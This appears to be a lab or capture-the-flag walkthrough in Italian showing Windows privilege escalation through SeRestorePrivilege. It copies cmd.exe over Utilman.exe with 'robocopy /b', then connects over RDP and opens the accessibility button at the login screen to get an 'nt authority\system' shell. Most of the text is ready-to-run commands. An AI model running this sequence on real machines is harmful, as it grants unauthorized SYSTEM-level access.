tags: Windows_Privilage_Escalation SeRestorePrivilege Ultiman
Crea una cartella temporanea e copiaci dentro il cmd.exe (il prompt dei comandi), ma rinominalo in Utilman.exe:
mkdir C:\Temp
copy C:\Windows\System32\cmd.exe C:\Temp\Utilman.exe
Ora in C:\Temp hai un “finto” Utilman che in realtà è una shell.
Ora usiamo SeRestorePrivilege per sovrascrivere l’originale in System32. Normalmente Windows ti direbbe “Access Denied” perché quel file appartiene a TrustedInstaller. Ma con robocopy /b (Backup Mode), tu passi sopra a tutto:
robocopy /b C:\Temp\ C:\Windows\System32\ Utilman.exeSe il comando va a buon fine, vedrai “Copied: 1”. (Nota: Se fallisce, potrebbe essere Windows Defender che protegge i file di sistema. In quel caso useremo un Piano B, ma prova prima questo).
Ora il file è sostituito. Per eseguirlo, dobbiamo andare alla schermata di login. Non possiamo farlo dalla shell attuale. Ci serve una connessione RDP (Remote Desktop):
xfreerdp /v:10.129.x.x /u:Utente /p:LaPasswordCheHaiTrovato /cert:ignore-
Una volta che vedi il desktop remoto (o la schermata di login), NON fare login.
-
Cerca l’icona dell’Accessibilità (di solito è un omino stilizzato o un orologio in basso a destra o sinistra).
-
Cliccala (o premi
Win + U).
Invece di aprirsi le opzioni per ipovedenti, si aprirà una finestra nera: è il prompt dei comandi. Digita whoami e vedrai: nt authority\system